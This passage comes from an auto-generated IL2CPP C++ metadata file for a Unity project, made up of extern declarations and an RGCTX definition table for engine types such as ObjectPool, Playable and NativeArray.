extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT4_t0BBC6D9FC60BD795EF0615DE3AF72F4023D692E4_m25ED019E3FF0305418A1E8660262063F68761B0D;
extern const uint32_t g_rgctx_T1_tCE3D89B38CA521697C593DAE4D82CAFBB2C9ED94;
extern const uint32_t g_rgctx_T2_t34D887E41D241A60221CA639979D3D4F38703E87;
extern const uint32_t g_rgctx_T3_tFBD42D7B101B8A5CD76C71411573A51F3E2853CA;
extern const uint32_t g_rgctx_T4_t0BBC6D9FC60BD795EF0615DE3AF72F4023D692E4;
extern const uint32_t g_rgctx_UnityAction_4_Invoke_m8DF32CE2946727C5507D46D1FD8AD351D15816AB;
extern const uint32_t g_rgctx_InvokableCall_1__ctor_m1389E18EDB338B358E4F3F611C988D4F289C3610;
extern const uint32_t g_rgctx_InvokableCall_1_t9D6E3FE6D6A16671D4E69788C9ACC7F2B36C7991;
extern const uint32_t g_rgctx_InvokableCall_1_Invoke_mFF9FABA4D19E5E62BC94188FD9669DF0822877AF;
extern const uint32_t g_rgctx_UnityEvent_1_GetDelegate_m4C1A6FA5CC5A98FA9363140CBDCE7F4C8EA790B9;
extern const uint32_t g_rgctx_UnityEvent_1_t89A7C04EA256B0BC85B7146022DCB5DEE2372F96;
extern const uint32_t g_rgctx_T0_t1DDE0E960341E6946BD0558FBC0AF39C25D1BADD;
extern const uint32_t g_rgctx_InvokableCall_1_tE6E100E6334FD6163AE44C87E199C349C093BD75;
extern const uint32_t g_rgctx_InvokableCall_1__ctor_m5A5E72EA57CAF0FB814DC260129AF6299C863168;
extern const uint32_t g_rgctx_InvokableCall_1__ctor_m059C54248830773976A8AA9E2376F2084554A793;
extern const uint32_t g_rgctx_InvokableCall_1_Invoke_m6FE04AA3ACA2CCDADFDBD7370510749312B0A9C1;
extern const uint32_t g_rgctx_T0_t1DDE0E960341E6946BD0558FBC0AF39C25D1BADD;
extern const uint32_t g_rgctx_T0_tAA07CC24358202AA2E3E7613A154A398E0B7B225;
extern const uint32_t g_rgctx_T1_t71A7ECBDA9A30E9DF39AB8875233AB21E2D64D81;
extern const uint32_t g_rgctx_InvokableCall_2_t4BFE337E7B7692E2C6577ACD66F585B79CE14A24;
extern const uint32_t g_rgctx_InvokableCall_2__ctor_m0919348880B03810235E94AB7B17DEEBD362EA14;
extern const uint32_t g_rgctx_InvokableCall_2_Invoke_m98F0496104C7CC3C6ACDAAB7A7325C8091995B8C;
extern const uint32_t g_rgctx_T0_tAA07CC24358202AA2E3E7613A154A398E0B7B225;
extern const uint32_t g_rgctx_T1_t71A7ECBDA9A30E9DF39AB8875233AB21E2D64D81;
extern const uint32_t g_rgctx_T0_t2BF919984BA3AAA12AAAF3E9960454C42BB39A22;
extern const uint32_t g_rgctx_T1_t71CAC2632D33DBDDEE8DA6226138D3EDF698F5D9;
extern const uint32_t g_rgctx_T2_tCDED8A2B57D1F30D46697051883B8E26107AC0E1;
extern const uint32_t g_rgctx_InvokableCall_3_t010264F21755EF589AF36AB230DF4498652AB3BE;
extern const uint32_t g_rgctx_InvokableCall_3__ctor_mB9CDB20563729AB099EA7E3162512DAA4ED765FF;
extern const uint32_t g_rgctx_InvokableCall_3_Invoke_m2B54FFBD2AE2161557093314FE3001E70D7199A0;
extern const uint32_t g_rgctx_T0_t2BF919984BA3AAA12AAAF3E9960454C42BB39A22;
extern const uint32_t g_rgctx_T1_t71CAC2632D33DBDDEE8DA6226138D3EDF698F5D9;
extern const uint32_t g_rgctx_T2_tCDED8A2B57D1F30D46697051883B8E26107AC0E1;
extern const uint32_t g_rgctx_T0_tD2970B459E331AB1F26BE87351F9ED7EA5BE4495;
extern const uint32_t g_rgctx_T1_t946247E05BF713B0B6D28C73BB95D5A26B0220B4;
extern const uint32_t g_rgctx_T2_tEAFC8D2E09B9D0FB1F1EBFF88BA6ACD3D4BDCD37;
extern const uint32_t g_rgctx_T3_t2C56F4E8001A03C9253A7F7E73722E18F6784426;
extern const uint32_t g_rgctx_InvokableCall_4_t2364CDDEAD7D89EC8A3DF50EDA200336E070465B;
extern const uint32_t g_rgctx_InvokableCall_4__ctor_m925C0D7AB0E0E91F76BEE4603727F999289C8274;
extern const uint32_t g_rgctx_CollectionPool_2_tBED14C57FCB68DB76BF3F96F4FB125E03B25076A;
extern const uint32_t g_rgctx_ObjectPool_1_t7C13985D550A748FA9A6B94F9C1623CE4679F470;
extern const uint32_t g_rgctx_ObjectPool_1_Get_mA3C3EBD279EB78EE26579B86090F039A025B3AAD;
extern const uint32_t g_rgctx_ObjectPool_1_Release_m7E889E584638CF6B9C781FE859969C7915AD730A;
extern const uint32_t g_rgctx_U3CU3Ec_t63CAD67F42EE09460E8CE67D3D4AFC06C24EC824;
extern const uint32_t g_rgctx_U3CU3Ec_U3C_cctorU3Eb__5_0_m0B4164FD1C7C2E4CE0BE3446510F35EFCFFB1BD7;
extern const uint32_t g_rgctx_Func_1_t60D3E01E44AD68BD9FFC56E26FD378C90CEF589B;
extern const uint32_t g_rgctx_Func_1__ctor_m3AD0F60CC3D5CA04D03B558DDF5BCDBDEF489DA1;
extern const uint32_t g_rgctx_U3CU3Ec_U3C_cctorU3Eb__5_1_mB08119F806C7F8C2A74BEDF68322D727EAE53003;
extern const uint32_t g_rgctx_Action_1_t80D55DE3AD8221E0F566C71FCBD9992DAC8FECA3;
extern const uint32_t g_rgctx_Action_1__ctor_m5D4DE6984C42AAD6BA6FE2D8FBD1F839050CB78D;
extern const uint32_t g_rgctx_ObjectPool_1__ctor_m6B07874047F865BA4688F5D820D36045341DEA93;
extern const uint32_t g_rgctx_U3CU3Ec_t04D4865A912255024F906D17C8A195EE1593748A;
extern const uint32_t g_rgctx_U3CU3Ec__ctor_mB7955C548374943C37C5660785F721CA6B3BD6E4;
extern const uint32_t g_rgctx_U3CU3Ec_t04D4865A912255024F906D17C8A195EE1593748A;
extern const uint32_t g_rgctx_Activator_CreateInstance_TisTCollection_t5ED9CAA12108B62823E6AEA72BAD47F5185F55E1_m114906128EBF8B23F46CD524DC9A0172496A5CBB;
extern const uint32_t g_rgctx_TCollection_t5ED9CAA12108B62823E6AEA72BAD47F5185F55E1;
extern const uint32_t g_rgctx_ICollection_1_t2D304B3C7AEB2D43C3BBFFB1ADA33E7D20383732;
extern const uint32_t g_rgctx_ICollection_1_Clear_mEDD484F7F31DF15F6304ACD4B4DEB9503AC138C4;
extern const uint32_t g_rgctx_Stack_1_t51874C1852076325B81B447B9A48ABB244CD6A73;
extern const uint32_t g_rgctx_Stack_1_get_Count_mB3EA65BF31A8811A69F0232867BB97D6362705D8;
extern const uint32_t g_rgctx_Stack_1__ctor_m1E4E9ED2B0A86163C4B137FE188A671FB5A79B56;
extern const uint32_t g_rgctx_Func_1_tEF5BB74FDEF368155E200E306BA1CAD0CB436B65;
extern const uint32_t g_rgctx_Func_1_Invoke_mD557332A8DC62B9B0F100EEB545AC928457EAD47;
extern const uint32_t g_rgctx_ObjectPool_1_get_CountAll_m4ECEC17D66AC8E10D4F781136198ED61E58DC591;
extern const uint32_t g_rgctx_ObjectPool_1_set_CountAll_m3965F34127517FF3838F3B1A3151B87BE2A8C1F4;
extern const uint32_t g_rgctx_Stack_1_Pop_mD78C3927C6023A194CF29F5243DC01EA5FD3C1E4;
extern const uint32_t g_rgctx_Action_1_t4D3400CCC7A0899CF79A7812A39237BA49676E65;
extern const uint32_t g_rgctx_Action_1_Invoke_mD207BC1B3DA843EF8932F60D9A5F70B46DCA862E;
extern const uint32_t g_rgctx_ObjectPool_1_get_CountInactive_m7605BEF02A49685FD3519423597769D844625260;
extern const uint32_t g_rgctx_Stack_1_Push_m467D07D3B747D1F7388060988B44397DCD0993B2;
extern const uint32_t g_rgctx_Stack_1_GetEnumerator_m1E6C58F8735E23F5E5C2B78B3ECB879EFCA50FC7;
extern const uint32_t g_rgctx_Enumerator_get_Current_m993F2BF3884273797AEA8EFE9BCA9E266186A964;
extern const uint32_t g_rgctx_Enumerator_MoveNext_m86D1FD9CE7459031F88FB0634BA9EEE67D071577;
extern const uint32_t g_rgctx_Enumerator_t10F321F0F249396F101395FF9754641F919E1F48;
extern const Il2CppRGCTXConstrainedData g_rgctx_Enumerator_t10F321F0F249396F101395FF9754641F919E1F48_IDisposable_Dispose_m3C902735BE731EE30AC1185E7AEF6ACE7A9D9CC7;
extern const uint32_t g_rgctx_Stack_1_Clear_m0FD190D2BCD7A22ECB30E64CD39619B52F49DF40;
extern const uint32_t g_rgctx_ObjectPool_1_Clear_mAD5C9798EC2C21AC68D8095711D14A3CEB4C0B76;
extern const uint32_t g_rgctx_PlayableHandle_IsPlayableOfType_TisT_tB2B622F171CCFF9E1D294238490B4482DD90AFE2_mB5FB29158085E328CA1E561F70EA217028B29484;
extern const uint32_t g_rgctx_U_t7165E1095948D7F13B5BB543F034843993B1CAC0;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t7165E1095948D7F13B5BB543F034843993B1CAC0_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tE51111571B334A78E0169C5956EC2C33ED797B1A;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tE51111571B334A78E0169C5956EC2C33ED797B1A_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t93E807654D5EFF609A60E5348D6B59F32B20B3A5;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t93E807654D5EFF609A60E5348D6B59F32B20B3A5_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tEB34E7006EB6152212FDE591D7B2020751EDB5C6;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tEB34E7006EB6152212FDE591D7B2020751EDB5C6_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tE282C7B460AE72C136264F3CF4DFCFC1A640E389;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tE282C7B460AE72C136264F3CF4DFCFC1A640E389_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tAAAE615B0ACA4BCD1176156EAE5D6214890750D5;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tAAAE615B0ACA4BCD1176156EAE5D6214890750D5_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t8725078EA0797AF50313F2AB4821AE87329609F3;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t8725078EA0797AF50313F2AB4821AE87329609F3_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t141026B03853BCF9FA2D4004C4BF60DC8FE2C0C0;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t141026B03853BCF9FA2D4004C4BF60DC8FE2C0C0_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tD72C7740D7DCFFB798E873ED64272AAB481C3797;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tD72C7740D7DCFFB798E873ED64272AAB481C3797_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tA31787C53364A0265F9F617352FA3BE38FB96DCF;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tA31787C53364A0265F9F617352FA3BE38FB96DCF_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t5230FB256B0A96F25149680A059D4FF594026951;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t5230FB256B0A96F25149680A059D4FF594026951_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t818671201FF43628189E3F10526D64851E02AA13;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t818671201FF43628189E3F10526D64851E02AA13_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t987922F52956AC366BE50722C41545D328633AA8;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t987922F52956AC366BE50722C41545D328633AA8_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t769081027EEBEEEC669DC8B24CCDA73F4928B31F;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t769081027EEBEEEC669DC8B24CCDA73F4928B31F_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t52EA3730AAD92D094A9A84BAC6B083798F132AB7;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t52EA3730AAD92D094A9A84BAC6B083798F132AB7_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tDD365FC612C5478FECAEB2DB1AF32A576478C05B;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tDD365FC612C5478FECAEB2DB1AF32A576478C05B_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t2276554A2D1E73AF09708DE0359662B352C86CBE;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t2276554A2D1E73AF09708DE0359662B352C86CBE_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t4056E3E19A5453A7BD1EF15F4A9D0B300EC26628;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t4056E3E19A5453A7BD1EF15F4A9D0B300EC26628_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_V_tB678BA6868BE9BD37334A995A213CA1420D1CD8B;
extern const Il2CppRGCTXConstrainedData g_rgctx_V_tB678BA6868BE9BD37334A995A213CA1420D1CD8B_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t8C418B904271C95428E5C1F530EC494B81D2C436;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t8C418B904271C95428E5C1F530EC494B81D2C436_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tC9BC026F9F6E6BD02EBEB9DD6EC234DBFC6E4945;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tC9BC026F9F6E6BD02EBEB9DD6EC234DBFC6E4945_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t36E0279F39478D4D9F168139BA38DF37BEC7DEEF;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t36E0279F39478D4D9F168139BA38DF37BEC7DEEF_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_tC27447A30AEC8FD1B79C3801BEFE022B0439D23D;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_tC27447A30AEC8FD1B79C3801BEFE022B0439D23D_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t4CB470B96AF3E81F5C9AB8BFEE8F2F7D04D64642;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t4CB470B96AF3E81F5C9AB8BFEE8F2F7D04D64642_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_V_t59674EBA87F48F44D8D39AC1A1F19632D46E3060;
extern const Il2CppRGCTXConstrainedData g_rgctx_V_t59674EBA87F48F44D8D39AC1A1F19632D46E3060_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_T_tEEE15EC0E3D8D9FD79FF3D8B0CDD2BB3D4B3B329;
extern const uint32_t g_rgctx_T_t8347C3FFBA421F6891E8C74737DD40D4CC6D19A6;
extern const uint32_t g_rgctx_PlayableOutputHandle_IsPlayableOutputOfType_TisT_tA92DAFD198588008D1869AF828FCFB5513BB5355_mD8B52B699BD776422906F22E1D19F68734F1A0C1;
extern const uint32_t g_rgctx_U_t324DE05D29FF1D846183BBE0552DAB8493F5913B;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t324DE05D29FF1D846183BBE0552DAB8493F5913B_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04;
extern const uint32_t g_rgctx_U_t988FC5E2A13EB588F8BA85B00A4D78B4472B9BEE;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t988FC5E2A13EB588F8BA85B00A4D78B4472B9BEE_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04;
extern const uint32_t g_rgctx_U_t5114755AC4ECA0AB5E2823EC0A7B566037C32BD5;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t5114755AC4ECA0AB5E2823EC0A7B566037C32BD5_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04;
extern const uint32_t g_rgctx_U_t3764F0858F3BF8B197888C21C3759587F3AD9929;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t3764F0858F3BF8B197888C21C3759587F3AD9929_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04;
extern const uint32_t g_rgctx_V_t6437DE3F400BEF06F3BB4DD29B44B6CFFE5E6AA4;
extern const Il2CppRGCTXConstrainedData g_rgctx_V_t6437DE3F400BEF06F3BB4DD29B44B6CFFE5E6AA4_IPlayable_GetHandle_m270FD2834B8DEE4CF323D5076D12384901236A5A;
extern const uint32_t g_rgctx_U_t4047A919D5041AEAC606EA460DE52A8D9E80E544;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t4047A919D5041AEAC606EA460DE52A8D9E80E544_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04;
extern const uint32_t g_rgctx_U_t63875941164C08E69505FC1D4AC6BF48226BEEB6;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t63875941164C08E69505FC1D4AC6BF48226BEEB6_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04;
extern const uint32_t g_rgctx_U_t24F8421C34CAB406BB8534005838510151A338B8;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t24F8421C34CAB406BB8534005838510151A338B8_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04;
extern const uint32_t g_rgctx_U_t94EB615FD87489EED8A3D6B40C5B0CCB8EEF2F92;
extern const Il2CppRGCTXConstrainedData g_rgctx_U_t94EB615FD87489EED8A3D6B40C5B0CCB8EEF2F92_IPlayableOutput_GetHandle_m1DA8E17EA2CA2FAC188944D5DADB8346885C8C04;
extern const uint32_t g_rgctx_T_t6A5B76BCE73210AEDB5EF5CB26E967C1F4071660;
extern const uint32_t g_rgctx_ScriptPlayable_1_t19354139C0CB837A09E5DA25D90891077DCAC041;
extern const uint32_t g_rgctx_ScriptPlayable_1_CreateHandle_m92EA49C65996E699E1ACAFDEF63B61A96DB97E39;
extern const uint32_t g_rgctx_ScriptPlayable_1_t19354139C0CB837A09E5DA25D90891077DCAC041;
extern const uint32_t g_rgctx_ScriptPlayable_1__ctor_mDDF5DD1B8457059986BA761F6AD7E962427C7275;
extern const uint32_t g_rgctx_T_t53A24ED28E35FB06E2D7769265A3C845C197FA11;
extern const uint32_t g_rgctx_ScriptPlayable_1_CreateScriptInstance_m8DE6B68678897D9FC09DC014C29985D4DF9D76AF;
extern const uint32_t g_rgctx_ScriptPlayable_1_CloneScriptInstance_m9D7877B73E8D395BCC7800A35B36261DB3D1CA78;
extern const uint32_t g_rgctx_T_t53A24ED28E35FB06E2D7769265A3C845C197FA11;
extern const uint32_t g_rgctx_Activator_CreateInstance_TisT_t53A24ED28E35FB06E2D7769265A3C845C197FA11_m9A43F236C650FBC1F24792884692B255486D4D42;
extern const uint32_t g_rgctx_ScriptPlayable_1_CloneScriptInstanceFromEngineObject_mB63556D6E3FFF693D87D4FC8EE3332E52948582B;
extern const uint32_t g_rgctx_ScriptPlayable_1_CloneScriptInstanceFromIClonable_m1D8FDEA3793FC2296E21BB7F541A4E0C29FD07CD;
extern const uint32_t g_rgctx_PlayableHandle_GetObject_TisT_t53A24ED28E35FB06E2D7769265A3C845C197FA11_m23B1EA5AD6ED36AC6901FA7EADCF389892F3D5B9;
extern const uint32_t g_rgctx_ScriptPlayable_1_GetHandle_m87DB88BF9112060BEE97EA60A88D5D17A07FE3B1;
static const Il2CppRGCTXDefinition s_rgctxValues[369] =
{
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_JobStruct_1_t079CB5B73BCE0841F55E4D6CDA6494A010297D8A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tF4AF2A128E0752ED064F922D7181D6824613BB02 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_T_tF4AF2A128E0752ED064F922D7181D6824613BB02_IJob_Execute_m6FB7F8EFAB486DA016EA24BB9BED238B4FC4DA27 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tF4AF2A128E0752ED064F922D7181D6824613BB02 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_JobStruct_1_Execute_m0AAADCBE5D90D1000B3D704B14EB5408438E1CCD },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_ExecuteJobFunction_t4512BFE0B86D90D2328A29F4BCD80437EACDA954 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ExecuteJobFunction__ctor_mB59C9E8588B3AFEFC7979AF159ED46EAF96ED5E7 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_JobStruct_1_t9B14DC02939321AF08B0D9861EC2DE39FB2699ED },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_ParallelForJobStruct_1_t2887542AB5333DED2947E8B2B7688E18794D2239 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tFDC1689AE74A499B29AEBBF350042D7BEB5DF421 },
{ (Il2CppRGCTXDataType)5, (const void *)&g_rgctx_T_tFDC1689AE74A499B29AEBBF350042D7BEB5DF421_IJobParallelFor_Execute_m424D27AF3C66D5013E807D6FFF6B8E5D75A3DE82 },
{ (Il2CppRGCTXDataType)1, (const void *)&g_rgctx_T_tFDC1689AE74A499B29AEBBF350042D7BEB5DF421 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ParallelForJobStruct_1_Execute_mB120582907B13544F0AEFAA15E6BC96C1C70418F },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_ExecuteJobFunction_tD105541081E8AB3594F9FCA208DFBC84B1426C32 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_ExecuteJobFunction__ctor_m13591A35F12C3D8441B1DA0B8DF1983DF3835D8F },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_ParallelForJobStruct_1_tEF5B83079821A31EF124E43C06E887A9F3325A10 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArray_1_Allocate_m60649E26AC5304C543B02042550E51A7D463C303 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_NativeArray_1_t9FED9BA6969776FB13D9111EB338E0273EE689F7 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisT_t05490BB68E93F7FF07D46087FEC0242A3FB9D022_m61D616F8FC61F82F84449EC8C33B06BA3E1C6966 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArray_1_Copy_m6308887AADFF57218232AE27ED8FC936C3F6ABD9 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_AlignOf_TisT_t05490BB68E93F7FF07D46087FEC0242A3FB9D022_mEFEE041A96D654E4553F89C6BCCA3E640B9D5B05 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_ReadArrayElement_TisT_t05490BB68E93F7FF07D46087FEC0242A3FB9D022_m22920B967F49CAC1797C3E4CA48B3C12C63D94AF },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_WriteArrayElement_TisT_t05490BB68E93F7FF07D46087FEC0242A3FB9D022_m787E5CA4A9724FDD18197EA23B0CCAC37626A0ED },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArray_1_Copy_m3565072C1980A9D12B35F7F39A33511D7AB14718 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_TU5BU5D_t27376E1E4CDE114D84EA76275CB9D10E1C6D9A7B },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArray_1_Copy_m77ADC4C5DB7BFBBCFA6114150D1C0DFF0383BEA5 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_Enumerator_tE2EF59F915D6B7F2A37C947360340D614063ACE2 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Enumerator__ctor_m0E321AD2EF64898A83F9AE834A7C248665FF10C7 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArray_1_GetEnumerator_mA95B7D8B0D3419D5CBE4A7D8A2A2E2D57757AB0C },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_NativeArray_1_t9FED9BA6969776FB13D9111EB338E0273EE689F7 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArray_1_Equals_mA006DE1192EAB16EF588E028577FA5169BABD1C5 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeArray_1_Copy_mA942412A07ACB176B4BB4284392869058329C990 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Enumerator_get_Current_m5D805336760473EF350CA58A4BB168EB1997843A },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_T_tCB2B4AD90EC47251952F0D7CF84CE2365DFB7790 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_NativeSlice_1_tC58EE9C5F48409C0DD10A5E992370AE3A8A55539 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1__ctor_m745559B94C1453A37E437E965C8D8D52ED85B5A0 },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_NativeSlice_1_t3114B8E2EAA60048AD33FCFD3B980D459207EEA7 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1__ctor_m9EB5F63B4F4701E8807E28F760B656F57B388ADD },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1__ctor_mC7DE9713D4F8CB41CB3FD5BADF83BB8A16F7DDFF },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_NativeSlice_1_tA97EC884413647283F01C67B3BC95ED41379C2F3 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1__ctor_m0A772F5B6F5EA9FE33FC4CF88229B18484B5F5E5 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_m7489446AE88724EA66F526B05743889C02F56C0F },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_ReadArrayElementWithStride_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_mADBB37B5A41212DDDACB97E315F631496B914E6C },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_WriteArrayElementWithStride_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_m6432627C856E0BEB57E2BD02A4BD1AFAC3B7AA90 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSliceUnsafeUtility_GetUnsafePtr_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_m08BBE0E3CD809E62A863B771CF278D28A7E4EDBB },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1_get_Stride_m79069541DC62D6377285836CD49CC0E3997649D0 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSliceUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_m8092BBB0411F7D34F72793C9D65A973370DA5ADB },
{ (Il2CppRGCTXDataType)2, (const void *)&g_rgctx_Enumerator_t95EA745781BCCF798D9EFFE1A0E070FBFC471F8F },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_Enumerator__ctor_m280BEF2360693542715D2254731108D51F0D8830 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1_GetEnumerator_m2FF71F9A2E042FD3D64B1BE8635DCA733CF26EB1 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1_Equals_m76AE404ED4B8F993C43EF94E215462326B919F30 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_UnsafeUtility_SizeOf_TisU_tA1058349A06EDF870B28EF475B3941D46449D225_m5752883E0ADE6BA9DF8D0C962BB07660551BE2DB },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1_get_Length_m727DD3DA3EA23B15E5F9D5B51471CAA2E43C24F8 },
{ (Il2CppRGCTXDataType)3, (const void *)&g_rgctx_NativeSlice_1_get_Item_m6AEBECC0468FBA63C6D83222E8D3AE42194AF9AE },
